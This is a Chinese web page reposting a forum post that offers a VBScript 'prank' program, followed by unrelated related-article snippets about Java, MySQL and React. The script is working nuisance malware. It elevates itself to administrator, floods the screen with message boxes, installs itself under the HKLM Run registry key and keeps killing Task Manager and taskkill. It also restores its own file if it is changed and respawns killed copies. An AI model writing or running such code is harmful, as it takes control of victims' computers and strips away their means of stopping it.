弹窗php整人_[整人小程序] 超级信息框(无限弹窗++)

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

'貌似刚才缩进空格被吞了,再发一次

Set FSO = createobject("scripting.filesystemobject")

Set ws = Createobject("Wscript.shell")

Set SA = CreateObject("Shell.Application")

If Wscript.Arguments.Count = 0 Then

SA.ShellExecute "Wscript.exe",Chr(34) & Wscript.ScriptFullName & chr(34) & " msg","","runas",1

Wscript.Quit

ElseIf Wscript.Arguments(0) = "autorun" Then

SA.ShellExecute "Wscript.exe",Chr(34) & Wscript.ScriptFullName & chr(34) & " running","","runas",1

SA.ShellExecute "Wscript.exe",Chr(34) & Wscript.ScriptFullName & chr(34) & " uac","","runas",1

Wscript.Quit

End If

On Error Resume Next

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

Call QuitIfRunningTooMuch()

SelfFolderPath = FSO.GetFile(Wscript.ScriptFullName).ParentFolder.Path

If Right(SelfFolderPath,1) <> "\" Then

SelfFolderPath = SelfFolderPath & "\"

End If

ConfigPath = SelfFolderPath & "WindowMSGSaver.ini"

SelfScriptPath = Wscript.ScriptFullName

Self = FSO.OpenTextFile(SelfScriptPath).ReadAll

If Wscript.Arguments(0) = "msg" Then

MainMSG = InputBox ("请输入主信息:","整人-超级信息框","Message---SuperMessageBox")

If IsEmpty(MainMSG) Then

WScript.Quit

End If

WinTitle = InputBox ("请输入窗口标题:","整人-超级信息框","SuperMessageBox")

If IsEmpty(WinTitle) Then

WScript.Quit

End If

Call SaveConfig()

SA.ShellExecute "Wscript.exe",Chr(34) & Wscript.ScriptFullName & chr(34) & " uac","","runas",1

Else

Set SelfFile = FSO.OpenTextFile(ConfigPath)

MainMSG = SelfFile.ReadLine

WinTitle = SelfFile.ReadLine

Set SelfFile = Nothing

End If

Do

If Wscript.Arguments(0) = "msg" Or Wscript.Arguments(0) = "running" Then

MsgBox MainMSG,64+4096,WinTitle

Else

Call ExecIfRunningTooFew()

Call SaveSelfScript()

Call SaveConfig()

Call TerminateProcess("taskkill.exe")

Call TerminateProcess("taskmgr.exe")

Call AddRun()

End If

Loop

Function ExecIfRunningTooFew()

On Error Resume Next

Set Processes = objWMIService.ExecQuery("Select * from Win32_Process where Name = 'Wscript.exe'",,48)

ntr_uac = 0

ntr_**** = 0

For Each Process In Processes

If Process.CommandLine = """" & Wscript.FullName & """ """ & Wscript.ScriptFullName & """ uac" Then

ntr_uac = ntr_uac + 1

End If

If Process.CommandLine = """" & Wscript.FullName & """ """ & Wscript.ScriptFullName & """ msg" Then

ntr_**** = ntr_**** + 1

End If

If Process.CommandLine = """" & Wscript.FullName & """ """ & Wscript.ScriptFullName & """ running" Then

ntr_**** = ntr_**** + 1

End If

Next

If ntr_uac 

SA.ShellExecute "Wscript.exe",Chr(34) & Wscript.ScriptFullName & chr(34) & " uac","","runas",1

Call MessageBox("Process Protection is on",48+4096,"SuperMessageBox")

End If

If ntr_**** 

SA.ShellExecute "Wscript.exe",Chr(34) & Wscript.ScriptFullName & chr(34) & " running","","runas",1

Call MessageBox("Process Protection is on",48+4096,"SuperMessageBox")

End If

End Function

Function QuitIfRunningTooMuch()

On Error Resume Next

Set VBSProcesses = objWMIService.ExecQuery("Select * from Win32_Process where Name = 'Wscript.exe'",,48)

ntr = 0

For Each VBSProcess in VBSProcesses

If InStr(1,VBSProcess.CommandLine,Wscript.ScriptFullName) = Len(Wscript.FullName) + 5 Then

ntr = ntr + 1

If ntr > 3 Then

Wscript.Quit

End If

End If

Next

End Function

Function SaveConfig()

On Error Resume Next

Write = False

CorrectContent = MainMSG & Chr(13) & Chr(10) & WinTitle & Chr(13) & Chr(10)

If Not FSO.FileExists(ConfigPath) Then

Write = True

ElseIf FSO.OpenTextFile(ConfigPath).ReadAll <> CorrectContent Then

Write = True

End If

If Write Then

FSO.GetFile(ConfigPath).Attributes = 0

FSO.GetFile(ConfigPath).Delete

FSO.CreateTextFile(ConfigPath,True).Write CorrectContent

End If

FSO.GetFile(ConfigPath).Attributes = 7

End Function

Function SaveSelfScript()

On Error Resume Next

Write = False

If Not FSO.FileExists(SelfScriptPath) Then

Write = True

ElseIf FSO.OpenTextFile(SelfScriptPath).ReadAll <> Self Then

Write = True

End If

If Write Then

FSO.GetFile(SelfScriptPath).Attributes = 0

FSO.GetFile(SelfScriptPath).Delete

FSO.CreateTextFile(SelfScriptPath,True).Write Self

End If

End Function

Function TerminateProcess(ProcessName)

On Error Resume Next

Set Processes = objWMIService.ExecQuery("Select * from Win32_Process where Name = '" & ProcessName & "'",,48)

For Each Process In Processes

Process.Terminate

Call MessageBox("[" & ProcessName & "] is disabled",16+4096,"SuperMessageBox")

Next

End Function

Function AddRun()

On Error Resume Next

Past = ""

CorrectRegContent = "Wscript.exe """ & Wscript.ScriptFullName & """ autorun"

RunRegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SuperMessageBox"

Past = ws.RegRead(RunRegPath)

If Past <> CorrectRegContent Then

ws.RegWrite RunRegPath,CorrectRegContent

End If

End Function

Function MessageBox(Content,Icon,Title)

On Error Resume Next

Content = Replace(Content,Chr(13),""" & Chr(13) & """)

Content = Replace(Content,Chr(10),""" & Chr(10) & """)

FilePath = SelfFolderPath & CreateRandomizedText(5) & ".vbs"

FileContent = "CreateObject(""Scripting.FileSystemObject"").DeleteFile Wscript.ScriptFullName" & Chr(13) & Chr(10) & "Msgbox """ & Content & """," & CStr(Icon) & ",""" & Title & """"

FSO.CreateTextFile(FilePath,True).Write FileContent

ws.Run """" & FilePath & """"

End Function

Function CreateRandomizedText(Length)

On Error Resume Next

Final = ""

letters="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

LLength = Len(letters)

For i=1 To LLength

Randomize

rdnum = Int(85 * Rnd) + 1

Final = Final & Mid(letters,rdnum,1)

Next

CreateRandomizedText = Final

End Function

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/277585.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

day22 Java学习 IO流(序列流)

IO流&#xff08;序列流&#xff09; 序列流&#xff1a; * 可以把多个字节输入流整合成一个&#xff0c;从序列流中读取数据时&#xff0c;将从被整合的第一个流开始读&#xff0c;读完一个之后继续读第二个。 整合方式&#xff1a; * Seq uenceInputStream ( InputStream &am…

网站建设-简单动态网站搭建

通过前面Clouder课程的学习&#xff0c;或许你已经掌握了在云服务器上发布和部署静态网页的方法&#xff0c;那么如何搭建一个可以随时更新内容的动态网站&#xff1f;通过本课程的学习&#xff0c;你将掌握如何在云端搭建全世界使用最多的WordPress网站的方法&#xff0c;并学…

mysql的concat函数_MySQL中concat函数(连接字符串)

MySQL中concat函数使用方法&#xff1a;CONCAT(str1,str2,…)返回结果为连接参数产生的字符串。如有任何一个参数为NULL &#xff0c;则返回值为 NULL。注意&#xff1a;如果所有参数均为非二进制字符串&#xff0c;则结果为非二进制字符串。如果自变量中含有任一二进制字符串&…

利用airTest的图像实别技术测试Web应用

airTest的第三方类库中有图像实别功能&#xff0c;根据官网的介绍&#xff0c;这个功能是能够在Windows上用来定位元素&#xff0c;进行操作的。尝试过以下脚本&#xff0c;发现真的可以。 from selenium.webdriver.chrome.options import Options from selenium import webdri…

MySQL主从复制故障解决

丛库复制停止&#xff0c;进丛库查看&#xff0c;报错1007&#xff0c;数据库已存在&#xff0c;不能创建数据库 mysql> show slave status\G; Slave_IO_Running: Yes Slave_SQL_Running: No Last_Errno: 1007 Last_Error: Error Cant create database test; database exis…

Unraveling the JPEG file

(文章还剩实践部分没写&#xff0c;答辩过后补上...) JPEG文件在当下数字化生活中是无处不在的&#xff0c;但是在熟悉的JPEG面纱背后&#xff0c;隐藏着一些算法&#xff0c;它们去除了人类眼中无法察觉到的细节。这产生了最高的视觉质量与最小的文件大小。让我们来看看这一算…

mysql interval 3 day_Mysql之INTERVAL与DATE_SUB与EXTRACT函数的使用

1. INTERVALINTERVAL代表的是时间间隔MySQL中的时间间隔类型有如下几种:1.1 利用INTERVAL做时间的加减法示例&#xff1a;加法:SQL>SELECT DATE 2018-11-01 INTERVAL 10 11 DAY_HOUR;结果:2018-11-11 11:00:00减法&#xff1a;SQL> select date 2018-11-11 11:00:00 -INT…

(二十四)面向对象

class Car {int num;String name;String color;public static void run() {System.out.println("行驶中");} } //再类中定义的变量&#xff1a;成员变量 //在类中定义的函数&#xff1a;成员函数 class Demo1 {public static void main(String[] args) {//创建一个ca…

mysql 三主_MySQL主主复制3

一、创建并授权用户在每一台(主)服务器上创建一个用户&#xff0c;并为之授权&#xff0c;使它们可以互相访问彼此的数据库在Server-1上&#xff1a;创建一个充许Server-2来访问的用户server2,密码为&#xff1a;server2mysql> GRANT REPLICATION SLAVE ON *.*> TO ‘ser…

0727日志

为什么80%的码农都做不了架构师&#xff1f;>>> c端线上地址 http://x.diandanme.com/fe/?d183#/ 什么时候来需求&#xff0c;我做好准备了吗&#xff1f; eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC94LmRpYW5kYW5tZS5jb21cL2FwaVwvd2VjaGF0XC…

Python基础学习总结__Day3

一、集合 1&#xff0e;特性&#xff1a;无序且天生去重&#xff0c;格式为{} 2&#xff0e;作用&#xff1a; &#xff08;1&#xff09;去重 &#xff08;2&#xff09;关系测试 3&#xff0e;可调用函数&#xff08;常见对列表操作&#xff09; &#xff08;1&#xff09;取…

day8网络编程,面向对象1

一.只是回顾 1.导入模块的顺序,首先从当前目录下找,再从环境变量里面找,使用"sys.path.insert(0,需要导入的环境变量)"加入需要导入文件的环境变量; 2.如果不同项目中有相同的文件,需要导入文件,需要将非当前项目中右键添加的环境变量取消,将当前的环境变量添加上去;…

mysql练手数据_MySQL新手练习

操作插入数据 的语法 :INSERT INTO 表名称 VALUES(值1&#xff0c;值2&#xff0c;......);修改数据 的语法&#xff1a;UPDATE 表名称 SET 字段名1 值1, 字段名2值2,...... 【WHERE 条件】;删除数据 的语法&#xff1a;delete from 表名 【[where 条件】;delete 表1&#xff…

spring security config

spring secuirty 相关的配置解析 permitAll()与web.ignoring() ingore是完全绕过了spring security的所有filter&#xff0c;相当于不走spring securitypermitall没有绕过spring security&#xff0c;其中包含了登录的以及匿名的。转载于:https://www.cnblogs.com/MND1024/p/10…

TSPITR方式数据库找回误操作丢失的数据

一、TSPITR介绍 TSPITR全称是Tablespace Point In Time Recover&#xff08;表空间基于时间点的不完全恢复&#xff09;。原理是通过辅助实例基于时间还原出误操作前的数据通过DataPump将数据导入到目标数据库。TSPITR的最大好处是不需要生产库停机。 二、适用场景 表空间时点恢…

乌班图系统的MySQL_乌班图系统mysql主从备份

一&#xff0e;准备系统&#xff1a;ubuntu 14.04.2 LTSMysql: server version 5.5.43两台主机可以互相通信&#xff1a;192.168.1.11 master192.168.1.12 slave二&#xff0e;步骤Master部分&#xff1a;1.创建备份帐号&#xff1a;slave密码&#xff1a;slaveGrant repl…

mysql table alter_MySQL-ALTER TABLE命令学习[20180503]

学习ALTER TABLE删除、添加和修改字段和类型CREATE TABLE alter_tab01(id int,col01 char(20))enginInnoDB default charsetutf8;删除字段ALTER TABLE DROP ;mysql> alter table alter_tab01 dropcol01;Query OK, 0 rows affected (0.01sec)Records: 0 Duplicates: 0 Warnin…

时间戳转换

13 位时间戳转换 1 通过java&#xff0c;如下&#xff1a; public static String timeStamp2Date(String time) {Long timeLong Long.parseLong(time);SimpleDateFormat sdf new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");//要转换的时间格式Date date;try {date …

React.Component(V16.8.6)

组件的生命周期 挂载 当组件实例被创建并插入 DOM 中时&#xff0c;其生命周期调用顺序如下&#xff1a; constructor()static getDerivedStateFromProps()render()componentDidMount()componentWillMount() 之后将废弃 更新 当组件的 props 或 state 发生变化时会触发更新。组…

mysql date类型加一个月jdbc_JDBC操作数据库Date类型数据

JDBC操作数据库Date类型数据由于java原生的工具类java.util提供的Date对象与JDBC提供的Date对象并不相同分别是java.util.Date和java.sql.Datejava.sql.Date是java.util.Date的子类所以在进行增删改查部分操作中&#xff0c;不能直接将原生工具类的Date对象直接运用到JDBC中可以…